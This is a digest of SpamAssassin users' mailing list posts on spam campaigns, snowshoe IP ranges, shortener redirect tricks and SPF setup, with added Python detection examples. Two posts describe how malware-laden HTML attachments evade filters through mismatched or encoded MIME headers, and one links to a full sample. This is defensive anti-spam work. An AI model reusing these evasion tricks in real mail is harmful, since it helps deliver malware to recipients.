The Unsub links, X-Mailer, and fake Unsub headers, combined,
are an excellent fingerprint.  They're trying to imitate 
ESP/Bulk senders, but these are mainly coming from 
normal ISP IPs.  I've added rules that only score those 
headers for non-ESP/Bulk IPs.

Of course, the very first thing I did was add RCHA to my
list of scammer symbols. :)
- Chip




Re: Rule FH_RANDOM_SURE causing FPs

2014-01-16 Thread Chip M.
I just checked the last six months of my most diverse corpus,
and found:  two Ham, zero spam.

Both ham were sent via different ESPs, each of mediocre 
quality though with multiple legitimate (albeit Pakled-y)
customers.

One was from Marriott Rewards with terse SA report:
score=0.9 required=5.1 tests=DKIM_SIGNED, DKIM_VALID, DKIM_VALID_AU, 
FH_RANDOM_SURE, FROM_EXCESS_BASE64, HTML_IMAGE_RATIO_08, HTML_MESSAGE, 
URIBL_BLOCKED

One was from MapMyRun with terse SA report:
score=6.3 required=5.1 tests=DIET_1, DKIM_SIGNED, DKIM_VALID, 
DKIM_VALID_AU, FH_RANDOM_SURE, HTML_MESSAGE, MIME_HTML_ONLY, 
MIME_HTML_ONLY_MULTI, MPART_ALT_DIFF, RCVD_IN_DNSWL_NONE, SUBJECT_DIET

That's using SA 3.3.2 with auto-updates (at a shared webhost).

Upon request, off list I can send the Message-IDs to any 
SA dev(s).  If the corpse(s) would be helpful, I can ask 
the domain admin for them.

I'm planning some data-mining this weekend, and would be happy
to check more data  (mild brag: I finally added flagging to my
data-mining tools, so it will auto-log, even if I forget to
explicitly check).  :)
- Chip



RE: Large # of Spam getting through all of a sudden.

2013-06-10 Thread Duncan, Brian M.

> On 6/10/2013 2:45 PM, Duncan, Brian M. wrote:
>> I rarely have seen any SpamAssassin hits on the bodies of these messages.
>>
>> (cached, score=-0.125,required 6.5, autolearn=not spam,
>> RP_MATCHES_RCVD -0.12)
>
> Do you train the Bayes database manually? Or via autolearn only?
>
> I use SA via AMaViS, and the header changes look slightly different from
> yours, but I see no evidence that Bayes scoring is being used in the
> above header (if, in fact, that is a sample header with all SA markup
> appended).
>
> --Ben


Thanks for the reply,

We use Autolearn only.

I was thinking of starting some manual training after this bout of messages 
getting through, I just did not know how much of a benefit I would see given 
the behavior of the Spammer -And I have to set up IMAP2mbox so I can get these 
messages from Exchange over to my sendmail boxes first, hope to do that today..

All the hosts are winding up on Zen and Maps after 24 hours, but they only send 
like 20 messages in each set into my environment..  Then they switch to a new 
sending mail server, I figured they would have burned through their hosts by 
now.  This sender seems to have amassed a large number of servers (not 
workstation botnets) before starting this last week.  I can't recall the last 
time we had this happen.


Brian



===
CIRCULAR 230 DISCLOSURE: Pursuant to Regulations Governing Practice Before the Internal Revenue Service, any tax advice contained herein is not intended or written to be used and cannot be used by a taxpayer for the purpose of avoiding tax penalties that may be imposed on the taxpayer.
===
CONFIDENTIALITY NOTICE:
This electronic mail message and any attached files contain information intended for the exclusive use of the individual or entity to whom it is addressed and may contain information that is proprietary, privileged, confidential and/or exempt from disclosure under applicable law.  If you are not the intended recipient, you are hereby notified that any viewing, copying, disclosure or distribution of this information may be subject to legal restriction or sanction.  Please notify the sender, by electronic mail or telephone, of any unintended recipients and delete the original message without making any copies.
===
NOTIFICATION:  Katten Muchin Rosenman LLP is an Illinois limited liability partnership that has elected to be governed by the Illinois Uniform Partnership Act (1997).
===


RE: Large # of Spam getting through all of a sudden.

2013-06-10 Thread Duncan, Brian M.

-Original Message-
From: Kris Deugau [mailto:kdeu...@vianet.ca]
Sent: Monday, June 10, 2013 2:21 PM
To: spamassassin-users
Subject: Re: Large # of Spam getting through all of a sudden.

*nod*  I recently flagged them as a nuisance netblock owner in the
internal DNSBL[1] here.  I've been seeing them for years.

I have 54 netblocks of various sizes and distances from the regional IP
registry on file for them, plus far more suballocations to their
apparent customers.


I would recommend scoring RP_MATCHES_RCVD to -0.001;  it may be useful
in combination with other factors, but as-is and with the default Bayes
autolearn thresholds it can cause bad Bayes autolearn results.  I'd also
recommend dropping the Bayes autolearn-as-ham threshold below 0.

-kgd
[1] To maintain this local DNSBL, I feed IPs and whatever ARIN, RIPE, APNIC, 
AfriNIC or LACNIC allocation and reallocation data I can find into a somewhat 
rough-edged tool I wrote:
https://secure.deepnet.cx/trac/dnsbl.  It's set up to preemptively tag 
netblocks over time;  if IPs keep getting reported in any given block, sooner 
or later it will cross a threshold and IPs not actually reported will still 
have a bit set in the DNS result.
In closing in on three years, I think I've removed netblocks for 
false-positives due to change in ownership of the block maybe twice.

Thanks for the suggestions and information on your experience with maintaining 
your own DNSBL. I have adjusted my autolearn-as-ham below 0 (-5 for now); I can 
see how, in the scenario that I am in, that was not helping me.  I also set 
my RP_MATCHES_RCVD to -0.001; I was going to do that anyhow based on other 
reading I have done.

After this I am considering taking a look at building my own DNSBL.  When I 
have more time later I will check out the tools you made; I took a quick look 
at the Perl scripts and it looks like they make it a lot easier to do myself.  
Thanks for making that available to everyone.


Brian




new (?) Google Translate trick using URL Shorteners

2012-12-10 Thread Chip M.
There's a new (to me), overly clever campaign combining Google 
Translate with a URL shortener.  It's fairly low volume, but most
are sailing thru SA.  It's such a goofy pattern it feels like it's
worthy of an Extinction level score. :)

These started yesterday (Dec 9) at around 2am Eastern US time, and
ALL the shorteners are still active. :(

They're all coming from Yahoo, with an unusual nation of origin.
In general, MANY of the interesting new campaigns are coming from
one or more of the big Freemailers.

All the URLs have the shortener domain encoded and look like:

http://google.com.ag/translate?u=%79%2e%61%68%6f%6f%2e%69%74/[REDACTED]?hl=en
which translates to:
http://google.com.ag/translate?u=y.ahoo.it/[REDACTED]?hl=en
The REDACTED element is _NOT_ encoded (and does not contain 
brackets, it's just a regular five character shortener parameter).
All are hitting SA's HTTP_EXCESSIVE_ESCAPES. :)

In all cases, the shortener goes to some variation of:
http://1427762013/[REDACTED]/[REDACTED].html

ALL of my samples go to the pure numerical domain 1427762013.
Could someone sanity check that that translates to 85.25.235.93?
That's in German light snowshoe territory. :)

I've seen that form before, and am surprised that any URL shortener
is still allowing those.

So far, there's always two subdirs, and they look like either 
year month, or month day (always numbers).
The filename is long (15 to 19 chars), and looks random, with all
mixed-case alphanumerical characters.

So far, they're all using unusual Google domains (including my old
favorite google.co.ck).  Google tricks campaigns often have 
started with rare TLDs, and often move to Google's default domain,
so it's probably best to write rules for all Google variations.


Suggestions:
Add metas for each of:
* Google Translate
* semi-legit but often exploited URL shorteners
* any Google URL with HTTP_EXCESSIVE_ESCAPES
* combinations of the above, and/or from Freemailers

Personally, I've jacked up the score of HTTP_EXCESSIVE_ESCAPES,
however I do see enough legit-but-thick senders who hit it, that I
understand why it's somewhat low.

John H:
I'll send you a couple of raw corpses so you can wave your
RE magic wand. :)
- Chip
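The unwrapping described above (percent-decoding the `u=` parameter on a Google Translate URL, then resolving the bare-integer host form of the landing page), as an added example in Python; this is not SpamAssassin code and not the poster's tooling. The Google host pattern, the shortener set, the escape threshold and the sample token/path are constructed for this example.

```python
import ipaddress
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Rough pattern for Google's country domains (google.com, google.com.ag,
# google.co.ck ...); an assumption for this example, not SpamAssassin's list.
GOOGLE_HOST = re.compile(r"^(?:www\.)?google\.[a-z]{2,3}(?:\.[a-z]{2})?$")

# Constructed shortener set; bitly.com is the longer alias of bit.ly.
SHORTENERS = {"y.ahoo.it", "bit.ly", "bitly.com"}

# Assumed threshold for this example; SpamAssassin's HTTP_EXCESSIVE_ESCAPES
# applies its own criterion.
ESCAPE_THRESHOLD = 4


def numeric_host_to_ip(host: str) -> Optional[str]:
    """Turn a bare decimal host such as '1427762013' into dotted-quad form."""
    if host.isdigit() and int(host) <= 0xFFFFFFFF:
        return str(ipaddress.IPv4Address(int(host)))
    return None


def analyze_url(url: str, depth: int = 0) -> dict:
    """Tag one URL; a Google Translate 'u=' wrapper is unwrapped one level."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    info = {"host": host, "ip": numeric_host_to_ip(host), "tags": [], "redirect": None}

    if len(re.findall(r"%[0-9A-Fa-f]{2}", url)) >= ESCAPE_THRESHOLD:
        info["tags"].append("EXCESSIVE_ESCAPES")
    if info["ip"]:
        info["tags"].append("NUMERIC_IP_HOST")
    if host in SHORTENERS:
        info["tags"].append("URL_SHORTENER")

    if depth == 0 and GOOGLE_HOST.match(host) and parts.path == "/translate":
        # parse_qs percent-decodes the value, so the hidden shortener host
        # comes out in clear text.
        target = parse_qs(parts.query).get("u", [""])[0]
        if target:
            info["tags"].append("GOOGLE_TRANSLATE_REDIRECT")
            if "://" not in target:
                target = "http://" + target
            info["redirect"] = analyze_url(target, depth + 1)
    return info


def all_tags(info: dict) -> List[str]:
    """Flatten the tags of a URL and of whatever it unwraps to."""
    tags = list(info["tags"])
    if info["redirect"]:
        tags += all_tags(info["redirect"])
    return tags


if __name__ == "__main__":
    # Constructed samples patterned on the post (shortener token and path made up).
    wrapped = "http://google.com.ag/translate?u=%79%2e%61%68%6f%6f%2e%69%74/ab12c?hl=en"
    landing = "http://1427762013/2012/12/aB3xY9kLmN0pQrS7z.html"
    print(analyze_url(wrapped))
    print(analyze_url(landing))
```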




re: Trouble with bayes poisoning spam

2012-11-30 Thread Chip M.
Hi Alex!

Actually, that's a Snowshoe IP.
Which, on balance, can be a good thing, slaying-wise. :)

Almost four years ago, I posted my approach to snowshoe slaying:

http://mail-archives.apache.org/mod_mbox/spamassassin-users/200902.mbox/%3c20090204.0...@iowahoneypot.com%3e

It has continued to evolve since then.
Both IP block tracking and identity (Subject  From.Realname)
header token checking are still the two most useful approaches.

I see you have hits on RELAYCOUNTRY.  If you maintain your own
virtual snowshoe nations, and merge them into your real nations,
while building a list of snowshoe tokens, you'll have very good 
success catching these.

For example, that IP is in root eSolutions space, and they have
had a snowshoe problem for at least a year and a half.

Here's their ranges that I have in my small scale database:
94.242.192.0 - 94.242.255.255
188.42.0.0 - 188.42.127.255
212.117.160.0 - 212.117.191.255

About two years ago, I hit a tipping point with my snowshoe IP
data, and can now _VERY_ rapidly identify new blocks.

Both of these phrases are in my snowshoe tokens database:
Classic Lantern
Incredible Light

I checked, and one of my best data feeds was hit by the same
IP block in your sample.  Here are quick dumps of the contents of
the identity headers:

frequency and contents of Field [Subject], filtered by [all  IP 
w/188.42.11.]
A unique christmas gift for the kids 
A variety of medigap options explained and simplified
Burn off that belly while you're sleeping 
Compensation information for those that suffered from mesh patch 
complications 
Endless inventory of electronics at 1/5th of what you'd pay for retail 
Ever wondered what it would be like to fly in a private jet?
It's time you chopped that home payment in half 
Learn a new tongue in days
Simple solutions for Medicare and Medigap
Speak Japanese in two weeks
Stop wasting time, start saving on your home payment 
We have your guide to being prepared in the event of a crisis or 
natural disaster 
You can get a Kindle Fire HD for around thirty bucks 
Your guide to being prepared in the event of a crisis or natural 
disaster 

frequency and contents of Field [RealnameFrom], filtered by [all  IP 
w/188.42.11.]
Adorable Santa Letters
Become Multilingual
Better Rates Today
Gain Kowledge
House Payment Halfer
Lose Pounds No Gym
MacBooks From 150.00
Medicare Made Simple
Medigap/Medicare Explained
Mesh Patch Patient Alert
Private Jet Share Packages
Samsung Galaxy Sold 28.54
Surgical Mesh Patch Patient Alert
Your Crisis Preparation Guide

When I get the time, AND some volunteers to help, I plan to publish
the most statistically significant data from BOTH databases. :)

Rob's Invalument data is supposed to be very helpful for snowshoe
detection.  Eventually, I'll get around to trying it. :)


*** John:
How practical would it be to create some metas that hinged off a
snowshoe nation hit on RelayCountry?  We'd have to define some
virtual nation codes, but that's easy.  I'm using a letter + number
combo, since none of the official two digit country codes contain
a number.

That way, you and others could come up with some very nifty 
snowshoe focused tests, and they would ONLY trigger if the sender
used a known snowshoe negligent host, AND the recipient server
chose to use IP-to-Nation tests.  Win-win. :)

I have the naively optimistic notion that some snowshoe hosts
simply do not have anti-spam expertise, and if there was a reliable
library of snowshoe patterns, they might test the outgoing mail of
new customers. :)

This week, I posted a list of proposed 2013 projects to my
volunteers, and at the top is exporting our MassCheck data for SA.
Also on the list are phish and snowshoe data sharing. :)

As soon as I've finished a couple of timesink projects, I'll start
on those.
- Chip
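The "virtual nation" idea from the post, as an added example in Python: known snowshoe ranges get a letter+digit code that is merged into the per-relay country list, and a meta fires only when such a relay is present AND an identity header carries a known token. This is not the poster's code and not a SpamAssassin plugin; the code "S1", the stand-in GeoIP table and the sample relays are constructed, while the three ranges and the two phrases are the ones quoted above.

```python
import ipaddress
from typing import Dict, List, Tuple

# Ranges quoted in the post, assigned a constructed virtual nation code.
# A letter + digit code cannot collide with a real two-letter country code.
SNOWSHOE_RANGES: Dict[str, List[Tuple[str, str]]] = {
    "S1": [("94.242.192.0", "94.242.255.255"),
           ("188.42.0.0", "188.42.127.255"),
           ("212.117.160.0", "212.117.191.255")],
}

# Constructed stand-in for a real GeoIP database (documentation ranges only).
GEOIP = {
    ipaddress.ip_network("203.0.113.0/24"): "AU",
    ipaddress.ip_network("198.51.100.0/24"): "US",
}

# Constructed token list; the two phrases are the ones quoted in the post.
SNOWSHOE_TOKENS = {"classic lantern", "incredible light"}


def build_index(ranges: Dict[str, List[Tuple[str, str]]]):
    """Expand first-last ranges into CIDR blocks once, for cheap membership tests."""
    index = []
    for code, pairs in ranges.items():
        for first, last in pairs:
            for net in ipaddress.summarize_address_range(
                    ipaddress.ip_address(first), ipaddress.ip_address(last)):
                index.append((net, code))
    return index


SNOWSHOE_INDEX = build_index(SNOWSHOE_RANGES)


def relay_nation(ip_text: str) -> str:
    """Virtual nation wins over the real country; 'XX' when neither knows the IP."""
    ip = ipaddress.ip_address(ip_text)
    for net, code in SNOWSHOE_INDEX:
        if ip in net:
            return code
    for net, country in GEOIP.items():
        if ip in net:
            return country
    return "XX"


def relay_countries(relay_ips: List[str]) -> str:
    """Space-separated list in the style of RelayCountry's X-Relay-Countries
    value, with virtual nations merged in (one entry per Received hop)."""
    return " ".join(relay_nation(ip) for ip in relay_ips)


def is_virtual(code: str) -> bool:
    """Letter followed by digits: our own code, never an ISO country."""
    return len(code) >= 2 and code[0].isalpha() and code[1:].isdigit()


def snowshoe_meta(subject: str, from_name: str, countries: str) -> bool:
    """The proposed meta: fire only when a snowshoe-negligent host relayed the
    message AND Subject/From realname carries a known snowshoe token."""
    text = f"{subject} {from_name}".lower()
    token_hit = any(tok in text for tok in SNOWSHOE_TOKENS)
    nation_hit = any(is_virtual(c) for c in countries.split())
    return token_hit and nation_hit


if __name__ == "__main__":
    # Constructed relay chain: one ordinary hop, one hop inside a listed range.
    chain = relay_countries(["203.0.113.7", "188.42.11.5"])
    print(chain, snowshoe_meta("A unique christmas gift", "Classic Lantern", chain))
```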




another malware MIME header trick that works with at least one email client

2012-07-25 Thread Chip M.
There's yet another variant in the ongoing campaign of HTML file 
attachments with javascript malware payloads. :(

The trick is that it sets the Content-Type to application/zip,
and uses an .htm file extension, for example (actual spam):
Content-Type: application/zip
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=Wire_ID88283.htm

This time, it WORKS as the spammer intends, with at least one 
email client (see P.S.).

The payload looks like it's part of Blackhole (pretty much the same
code as was blasted out last week).

Full sample (with mildly/obviously redacted email addresses):
http://puffin.net/software/spam/samples/0012_malware_zip_fake.txt

The vast majority of my samples claim to be from popular phish 
targets, including:  UPS, LinkedIn, Craigslist.

Note that none of these is hitting test T_HTML_ATTACH.

The SpamAssassin scores have ranged from 0.0 thru 3.0 - yes, 
100% are sailing thru.  (They're all being killed by the anti-zip
tests in my post-SA cleanup filter.)

Normally, I'd do a corpora check, to see whether there are any 
legitimate instances of this ContentType file extension mismatch, 
but in this instance, even if it did occur in Ham, it's so 
phenomenally STUPID, that I consider it a waste to allow for it.
Some ham was born to die. :\


That opens up the broader issue of mismatches between CTs and
extensions.  The most common legit type I've seen are images,
almost always in niche newsletters, which usually have enough
other, um, eccentricities that they should only be mildly dinged.

When I get some time, I will write some code to analyze my corpora,
and post a detailed list of what mismatches I'm seeing in ham, in 
the wild.

For now, I think it would be a good idea to heavily ding 
all mismatches involving HTML file attachments.  They have too much
potential for harm, and many SA users are small domains without
subject matter expertise (which is exactly how I came to use this
fantastic tool!), and with minimal to no other defensive layers.
Let's give the little guy/gal some help. :)
- Chip

P.S. I tested this by manually removing the base64 encoded payload,
substituting in the base64 portion of a non-attachment HTML part
from a ham, then reinjecting the raw file into my queue.

Eudora 7.1.0.9 translated it to an HTML file, and was able to open
it without any difficulty (it did show a generic warning dialog).

I'll be repeating that with a friend who uses MS clients.
I might put that defanged test case online if anybody would like to
use it to test less mainstream clients.

I used the same basic methodology to test a more elaborate trick
spotted two weeks ago.  The file attachment of that variant was
correctly dropped by both Eudora and a couple of MS clients.

Thanks to list members who have kindly taken the time to test some
of my previous samples! :)




new twist on BitLy

2012-05-03 Thread Chip M.
There's a new campaign using bitly.com, instead of bit.ly.

Other characteristics are:
1. empty plain text Part, followed by a quoted-printable HTML Part
2. very long HTML Title
3. large Style section, with random text (Bayes salad like)
4. current Subject is FW: your arrest record

I expect the Subject to change, soon.

I had a few hunh moments trying to figure out why my system 
wasn't extracting the shortener parameter, and why NONE of 
my shortener code was kicking in, then had the doh! moment.
Figured I'd try to save someone else that headache. :)

As soon as I realized that bitly.com is (apparently) a 
legit alias for the terser bit.ly, I naively jumped to the 
theory that I could probably kill all of those, because who 
(other than spammers) would be thick enough to use a 
longer URL as a shortener.

I've had plenty of naive obvious solutions foiled by Pakled
senders, so loaded up six months of my most diverse corpus.

Found two spam, and two ham.

Fortunately, the two ham were both political mailing lists,
which explains the twittery, and reinforces my prejudice that 
it's ok to score this domain heavily, as long as one has a 
good quarantine and FP pipeline.

I'll check some more corpora this weekend, and report back if
there's any non-trivial ham using this domain.
- Chip




Re: all spam emails from mailengine1.com servers

2011-10-21 Thread Chip M.
R - elists wrote: 
does anyone get legit emails that come from the mailengine1.com 
email marketing servers? 

Yes, I've seen a trickle of ham, so did some data mining for you...

The IP ranges I have for them are:
66.59.0.0 - 66.59.31.255
72.19.192.0 - 72.19.255.255
Does anyone have any others?

I found one other hostname:
mailengine3.com
and would infer there would be more, for you RE gurus. :)

The vast majority of what I've seen is spam, however there are 
enough human shields that you may want to score cautiously, 
depending on your environment.

Here's a few of the reasonably legit outfits who use them:
blueman.com
brokerhunter.com
concert-hq.com
dvo.com
email-eventsreg.com
flavorus.com
hotonbroadway.com
quizrocket.com
roddenberry.com
saprankings.com
searchsvc.com
tapulous.com
thecityevents.com

There were also several political spammers, who (as I recall) 
were/are bona fide candidates however they list appended party 
lists, and did NOT confirm them.

Most of those are leisure type sites, so a higher score could
be justifiable in a pure business environment, particularly if
you have a decent quarantine.  Personally, I kill them all, with
a hefty margin, but not above the level at which they'd show up
in our FP pipeline (only if they didn't hit any reliable
blocklists while Q'd).

Robert, thanks for asking!
While generating that data, I had an excuse to improve that report.
I also found a dangling legacy IP block with a lower spam score,
which should have been deprecated years ago, and now has been. :)
- Chip

P.S.  The Geek volunteer who hit the roddenberry domain
(cheerfully) accused me of killing Star Trek - I vaguely recall 
replying with the appropriate McCoy quote. ;)




new technique: borked zip attachment w/malware

2011-09-30 Thread Chip M.
There's an interesting new zip attachment obfuscation that uses
an encoded EMPTY filename.

I've seen barely a trickle, but so far, all have had VERY low
SA scores (1.1 with generally unremarkable test hits).

I'm still waiting for permission from the recipient to publish
a complete sample.
Here's an actual set of the zip's Content headers:

Content-Type: APPLICATION/X-ZIP-COMPRESSED; name==?iso-8859-5?B?NjI=?=
Content-transfer-encoding: base64
Content-Disposition: attachment; filename==?iso-8859-5?B?NjI=?=

There's one HTML part, followed by the zip part.


Probably the best general defense is to decide that if the 
filename is encoded, it implies the sender committed to putting
something there, and since it was empty, it's a reasonable trait
to score medium to high on.

At first, the unusual Content-Type seemed worth a modest score,
however I did find (business) Ham samples using that form.

Currently, I've got a kill level score for anything with either
zip or compressed in the CT, and which does NOT have .zip
as the file extension.  I do have a robust FP pipeline, so what
makes me feel good, may not work as well for everyone. :)


Does anyone know if any mainstream email client can open such a
file?
I don't use Outlook, so maybe someone who does could zip up 
something benign, email it to themself, grab the network image,
hack the CT filename as above, re-inject it, then try opening it.
- Chip
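A checker for the two attachment tricks in this post and in the 2012-07-25 "another malware MIME header trick" post (a zip-type Content-Type carrying an .htm filename; a zip/compressed Content-Type whose RFC 2047-encoded filename has no .zip extension), plus the "encoded but empty filename" trait suggested above, as an added Python example. It is not SpamAssassin code and not the poster's filter; the tag names are made up, and the sample messages are constructed around the header lines quoted in the two posts.

```python
import email
import os
from email.header import decode_header
from email.message import Message
from typing import List, Optional, Tuple


def decoded_filename(part: Message) -> Tuple[Optional[str], bool]:
    """Return (filename, was_rfc2047_encoded); filename is None when absent."""
    raw = part.get_param("filename", header="content-disposition")
    if raw is None:
        raw = part.get_param("name")            # fall back to Content-Type name=
    if raw is None:
        return None, False
    if isinstance(raw, tuple):                  # RFC 2231 (charset, language, value)
        raw = raw[2]
    encoded = raw.startswith("=?") and raw.endswith("?=")
    pieces = []
    for chunk, charset in decode_header(raw):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or "ascii", "replace")
        pieces.append(chunk)
    return "".join(pieces), encoded


def attachment_tags(raw_message: str) -> List[Tuple[str, str, List[str]]]:
    """Walk the MIME tree; return (content_type, filename, tags) per attachment."""
    findings = []
    for part in email.message_from_string(raw_message).walk():
        if part.is_multipart():
            continue
        filename, encoded = decoded_filename(part)
        if filename is None and part.get_content_disposition() != "attachment":
            continue                            # ordinary body part
        ctype = part.get_content_type()         # already lower-cased
        ext = os.path.splitext(filename or "")[1].lower()
        tags = []
        if encoded and not filename.strip():
            tags.append("ENCODED_EMPTY_FILENAME")
        if ext in (".htm", ".html") and ctype != "text/html":
            tags.append("HTML_EXT_CT_MISMATCH")
        if ("zip" in ctype or "compressed" in ctype) and ext != ".zip":
            tags.append("ZIP_CT_WITHOUT_ZIP_EXT")
        findings.append((ctype, filename or "", tags))
    return findings


def _message(ctype_line: str, disposition_line: str) -> str:
    """Constructed two-part message wrapped around the given attachment headers."""
    return "\n".join([
        "From: sender@example.invalid",
        "To: user@example.invalid",
        "Subject: sample",
        "MIME-Version: 1.0",
        'Content-Type: multipart/mixed; boundary="b1"',
        "",
        "--b1",
        "Content-Type: text/html",
        "",
        "<html><body>see attachment</body></html>",
        "--b1",
        ctype_line,
        "Content-Transfer-Encoding: base64",
        disposition_line,
        "",
        "ZHVtbXk=",          # placeholder payload, not the malware
        "--b1--",
        "",
    ])


# Headers quoted in the 2012-07-25 post: application/zip carrying an .htm name.
ZIP_AS_HTM = _message("Content-Type: application/zip",
                      "Content-Disposition: attachment; filename=Wire_ID88283.htm")
# Headers quoted in this post: encoded filename, no .zip extension.
BORKED_ZIP = _message("Content-Type: APPLICATION/X-ZIP-COMPRESSED; name==?iso-8859-5?B?NjI=?=",
                      "Content-Disposition: attachment; filename==?iso-8859-5?B?NjI=?=")
# Constructed: an encoded word that decodes to nothing at all.
EMPTY_NAME = _message("Content-Type: application/zip",
                      "Content-Disposition: attachment; filename==?utf-8?B??=")
# Constructed ham: a zip that says it is a zip.
HAM_ZIP = _message("Content-Type: application/zip",
                   'Content-Disposition: attachment; filename="report.zip"')

if __name__ == "__main__":
    for sample in (ZIP_AS_HTM, BORKED_ZIP, EMPTY_NAME, HAM_ZIP):
        print(attachment_tags(sample))
```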




Re: How to get rid of spam with From spoofed to my own domain

2011-09-11 Thread m...@smtp.fakessh.eu
On Monday 12 September 2011 00:35, Dave Funk wrote:
 On Sun, 11 Sep 2011, Martin Gregorie wrote:
  On Sun, 2011-09-11 at 13:47 -0700, rutra80 wrote:
  Hello, lately I receive spam which looks like coming from my domain,
  sometimes it is spoofed like coming from accounts that don't exist, and
  sometimes from the ones that really do. The only SA rule that it
  triggers is Bayesian one, with nearly 100% probability - it assigns 3.5
  points, but my rejection limit is set to 4.5 and I'm not eager to lower
  it. What would be the most elegant and technically correct way to get
  rid of the problem?
 
  Some spammer is forging your host name as sender and randomly generating
  user names.
 
  Set up an SPF record for your domain and make sure its valid by testing
  it with a validation tool.
 
  SPF references
  ==
  http://www.openspf.org provides an overview, documentation and SPF
  record builder wizards.
 
  http://www.kitterman.com/spf/validate.html has test tools to validate
  your SPF record after its built and again when it has been installed.

 However a simple SPF fail doesn't score many points. To deal with the
 exact same issue I added a custom local rule (a __rule so it doesn't
 score points) that looks for our domain name in the From and combined
 that with SPF_FAIL in a meta that really whacks the score.

 I.e., in general it's not safe to use SPF_FAIL as a one-shot-kill but
 when restricted to our domain I can trust it.


To say a little something:

I run the openspf software on my host,

and I'm having weird problems in the mail.

Return-Path: emilien.arino@noa.fr
X-Original-To: m...@smtp.fakessh.eu
Delivered-To: fake...@localhost.r13151.ovh.net
Received: from r13151.ovh.net (localhost.localdomain [127.0.0.1])
by r13151.ovh.net (Postfix) with ESMTP id E8CECCC187
for m...@smtp.fakessh.eu; Tue,  6 Sep 2011 14:11:50 +0200 (CEST)
X-SenderID: Sendmail Sender-ID Filter v1.0.0 r13151.ovh.net E8CECCC187
Authentication-Results: r13151.ovh.net; sender-id=fail (NotPermitted) 
header.from=emilien.arino@n***rea.fr; spf=fail (NotPermitted) 
smtp.mfrom=emilien.arino@noa.fr
Received: from localhost (localhost.localdomain [127.0.0.1])
by r13151.ovh.net (Postfix) with ESMTP id 7E064CC186
for m...@smtp.fakessh.eu; Tue,  6 Sep 2011 14:11:50 +0200 (CEST)
X-Amavis-GeoIP: France Aquitaine Pau
X-Amavis-GeoIP: France  
X-Header-AntiAbuse: report abuse to postmas...@fakessh.eu
X-Header-AntiAbuse: sender emilien.arino@noa.fr emilien.arino
@noea.fr emilien.arino@no*a.fr
X-Header-AntiAbuse: client addr 46.105.7.81
X-Header-AntiAbuse: client addr 217.119.181.45
X-Header-AntiAbuse: primary hostname r13151.ovh.net
X-Virus-Scanned: amavisd-new at r13151.ovh.net
Received: from r13151.ovh.net ([127.0.0.1])
by localhost (r13151.ovh.net [127.0.0.1]) (amavisd-new, port 10024)
with LMTP id poVU1eVAIlPQ for m...@smtp.fakessh.eu;
Tue,  6 Sep 2011 14:11:35 +0200 (CEST)
Received-SPF: pass (noa.fr: 46.105.7.81 is authorized to 
use 'emilien.ar...@novacrea.fr' in 'mfrom' identity 
(mechanism 'a:mo1.n*ea.fr' matched)) receiver=r13151.ovh.net; 
identity=mailfrom; envelope-from=emilien.arino@na.fr; 
helo=mo1.novacrea.fr; client-ip=46.105.7.81
X-SenderID: Sendmail Sender-ID Filter v1.0.0 r13151.ovh.net BA7B9CC0AE
Authentication-Results: r13151.ovh.net; sender-id=pass 
header.from=emilien.arino@na.fr; spf=pass 
smtp.mfrom=emilien.ar...@nrea.fr
X-Greylist: delayed 515 seconds by postgrey-1.34 at r13151.ovh.net; Tue, 06 
Sep 2011 14:11:32 CEST
X-My-Organisation: fakessh @
Received: from mo1.n***crea.fr (mo1.no*a.fr [46.105.7.81])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(Client did not present a certificate)
by r13151.ovh.net (Postfix) with ESMTPS id BA7B9CC0AE
for m...@smtp.fakessh.eu; Tue,  6 Sep 2011 14:11:28 +0200 (CEST)
Received: from mo1.ncrea.fr (localhost.localdomain [127.0.0.1])
by mo1.no*a.fr (Postfix) with ESMTP id 84F52A202
for m...@smtp.fakessh.eu; Tue,  6 Sep 2011 14:02:06 +0200 (CEST)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=novacrea.fr; h=me

the result of exam to pass
and sometimes different depending on the technology
-- 
 http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x092164A7
 gpg --keyserver pgp.mit.edu --recv-key 092164A7




Re: Securing spamd [single (non root) OS user]

2011-07-08 Thread m...@smtp.fakessh.eu
On Friday 8 July 2011 19:00, Andrzej Adam Filip wrote:
 Kārlis Repsons karlis.reps...@gmail.com wrote:
  All,
  I'd like you to review approximately how I'm running spamd. My concern
  is security. You can see that the child processes are run by spamd user,
  but the main process is still run by root:
 
  ps -C spamd -o user,cmd
  USER     CMD
  root     /usr/sbin/spamd -d -r /var/run/spamd.pid -m 2 -u spamd --nouser-config --helper-home-dir=/sysram/spamassassin --allow-tell
  spamd    spamd child
  spamd    spamd child
 
  How secure is that (no I didn't make any crazed chroots or so) and what
  would you suggest to isolate spamd from possible outside intrusions?
  Thanks...

 Do you need spamd changing OS user ids? (e.g. to access ~/.spamassassin/ )

 I have used personal [single (non root) OS user] spamd without any
 problems.

e.g. in my system 
the .spamassassin folder is owned by group users:
r13151 ~]# ls -al /home/fakessh/.spamassassin/
total 44
drwx--  2 fakessh users  4096 jui  6 20:31 .
drwxr-xr-x 19 fakessh users  4096 jui  6 01:38 ..
-rw---  1 fakessh users 12288 jui  6 00:17 auto-whitelist
-rw---  1 fakessh users 12288 jui  6 00:16 bayes_seen
-rw---  1 fakessh users 12288 jui  6 20:31 bayes_toks
-rw---  1 fakessh users  1869 jui  5 23:54 user_prefs

-- 
 http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x092164A7
 gpg --keyserver pgp.mit.edu --recv-key 092164A7




anti virus EICAR file is not detected by the couple clamd amavisd

2011-07-05 Thread m...@smtp.fakessh.eu
hi folks

in my station
anti virus EICAR file is not detected by the couple clamd amavisd


all testimonials are welcome
-- 
 http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x092164A7
 gpg --keyserver pgp.mit.edu --recv-key 092164A7




RE: DKIM Checks

2011-05-18 Thread Rosenbaum, Larry M.
 From: Matt [mailto:lm7...@gmail.com]
 Sent: Wednesday, May 18, 2011 11:32 AM
 To: users
 Subject: DKIM Checks
 
 I am running spamassassin-3.2.5-1.el5 on 64 bit CentOS.
 
 sa-update -D seems to indicate that the DKIM libraries are installed.
 ... 
 May 18 10:25:02.683 [15134] dbg: diag: [...] module installed:
 Mail::DKIM, version 0.39
 ...
